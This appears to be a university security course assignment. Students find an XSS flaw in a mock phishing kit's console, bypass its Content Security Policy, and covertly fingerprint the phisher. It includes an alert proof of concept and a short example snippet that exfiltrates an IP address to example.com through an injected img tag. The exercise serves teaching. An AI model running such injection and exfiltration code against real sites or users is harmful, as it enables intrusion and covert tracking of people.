Cross-Site Scripting

In this assignment, you will:

  1. Find a XSS vulnerability in a NU phishing kit console
  2. Gain code execution on the console page
  3. Exfiltrate the phisher’s IP address

Phishing Kit

You have obtained access to a copy of a phishing kit targeting Northeastern single sign on credentials for students, staff, and faculty. This kit is available in Canvas as a container called xss_00.img.xz or as bare source code in xss.tgz.

Your goal for this assignment is to uncover the identity of the phisher by identifying an injection vulnerability in the kit, gaining code execution in the console, and exfiltrating the phisher’s IP address. You can assume that the public instance is identical to the copy you have except for the value of app.secret_key.

Code Execution

Obtaining code execution will require identifying a XSS vulnerability in the phishing console. What is the attack surface available to you? What data presented in the console do you control?

The classic proof-of-concept payload to demonstrate code execution is to create an alert dialog box:

<script>alert("hi");</script>

Try to inject this PoC. Did it work?

Unless you are using an ancient browser, the PoC will have failed due to the presence of a Content Security Policy. Examine the policy presented by the phishing kit. Find a way to bypass the policy to gain code execution.

Attribution

With the ability to execute code with the privileges of the phishing kit origin, it’s time to move beyond a simple alert dialog. To attribute the attacker, you will start by obtaining their IP address and transmitting it to an endpoint you control.

Search for a way to obtain the phisher’s IP address using injected JavaScript.

Extended Attribution

While IP addresses are useful information, in reality they are not considered equivalent to personal identity from a legal perspective (see, e.g., VPR v. DOES 1–1017).1 This is in part because IP address assignments change over time, especially in the context of consumer ISP subscribers that obtain dynamic IP leases over DHCP that must be renewed every so often. One could also likely argue this result due to the prevalence of malware or endpoints used by multiple people.

Fortunately, browsers provide a rich amount of identifying information that allows one to create (virtually) unique fingerprints. A number of techniques exist to compute these fingerprints, and their use has increased in popularity for several purposes. Fraud or bot detection systems often rely on browser fingerprints, as well as some forms of CAPTCHA. Fingerprinting has also become more popular in the ad tech world in response to growing privacy protections rendering other tracking mechanisms less effective than in the past.

One of the most well-known techniques is called canvas fingerprinting, and relies on variance in browser implementations of the HTML5 canvas element. Here, code draws a mix of text and images to a canvas, renders this to an image, and then computes a hash of the image pixel data.

WebGL fingerprinting adopts the same approach as canvas fingerprinting, but instead of using a canvas element it instead uses a WebGL rendering context.

Numerous other techniques exist, such as:

  • device enumeration
  • audio fingerprinting
  • extension fingerprinting
  • display fingerprinting

Use one or more techniques to derive a fingerprinting algorithm that is independent of IP address. In the interests of stealth, executing the algorithm must not result in observable side effects to the phisher.

Exfiltration

With the identifying information in hand, let’s turn to exfiltration. The traditional method to perform a cross-origin exfil is to add an HTML tag to the document that causes a resource load that bypasses the same-origin policy. For instance, assuming that the attacker controls example.com:

const url = "https://example.com/?address=" + encodeUri(address);
const tag = "<img src='" + url + "'>";
document.write(url);

Try injecting a payload along these lines. Did it work?

Again, unless you’re using an ancient browser, the payload will have failed due to the kit’s CSP. Re-examine the policy, and find a way to bypass it.

Unmasking the Phisher

Once you have a fully-working attack, execute it against the “real” instance at http://neuidmsso.nëu.lol/idp/profile/SAML2/POST/SSO.

Each group’s instance is hosted on a separate port. For the port, add your group number to 18759.

For the purposes of greater realism, visits by the phisher will be intermittent and irregular. Also, the console will not be reset, so do not attack it until you have a reliable end-to-end attack working on your local copy!

Submission Instructions

  1. Upload a tgz archive to Canvas containing the following files:
    • A README.md describing what your attack does and the identity of the phisher
    • The source code for your attack
  2. Extra credit. Include in your submission an HTML file called fingerprint.html. When loaded in a modern browser, it should display an obvious message indicating whether the page is loaded in the phisher’s browser or not. It will be tested against a range of browsers.

  1. But, in some cases an IP address is considered PII.↩︎


© 2022 wkr